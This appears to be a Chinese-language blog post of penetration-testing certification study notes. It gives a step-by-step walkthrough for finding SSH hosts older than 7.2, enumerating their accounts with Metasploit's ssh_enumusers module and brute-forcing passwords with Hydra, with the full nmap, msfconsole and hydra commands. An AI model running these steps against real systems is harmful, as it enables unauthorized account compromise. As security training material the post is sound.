iT邦幫忙

2023 iThome 鐵人賽

DAY 29
0

SSH 7.2 版本以下的主機有漏洞,這邊介紹一下攻擊的步驟。

  • 主要步驟如下:

    • 先找出有SSH 7.2 版本以下的主機 (此版本有漏洞)
    • 再用 msfconsole 找帳號
    • 再用 Hydra 破解密碼
  • 執行端口掃描 (port 22)
    nmap 192.168.0.* -p22 --open -oG ssh_list.txt
    image.png

  • 提取出有開 SSH 的主機 IP 列表
    grep Up ssh_list.txt | cut -d' ' -f2 > ssh_ip.txt
    image.png

  • 使用 Nmap 工具執行版本掃描和腳本掃描
    nmap -iL ssh_ip.txt -p22 -sVC
    image.png

  • 找到這台的 SSH 版本太舊 有漏洞
    image.png

  • 使用 msfconsole 的找帳號
    利用模組 auxiliary/scanner/ssh/ssh_enumusers
    use auxiliary/scanner/ssh/ssh_enumusers
    set rhosts 192.168.0.70 //設定目標 IP
    set user_file Wordlists/Usernames.txt //設定帳號字典檔路徑
    set check_false true //檢查 SSH 服務的響應以確保它不僅僅返回 "false",這有助於避免虛假的陽性結果。
    exploit
    image.png

  • 找到了兩個帳號
    image.png

  • 利用 hydra 破解密碼
    hydra –t 4 –l <username> –P <passwords.txt> ssh://<ssh_IP>
    hydra –t 4 –L <users.txt> –P <passwords.txt> ssh://<ssh_IP>
    image.png
    找到密碼了!


上一篇
Crackmapexec 爆破 SMB
下一篇
終於完賽~
系列文
滲透測試小白的 CPENT 證照學習筆記30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言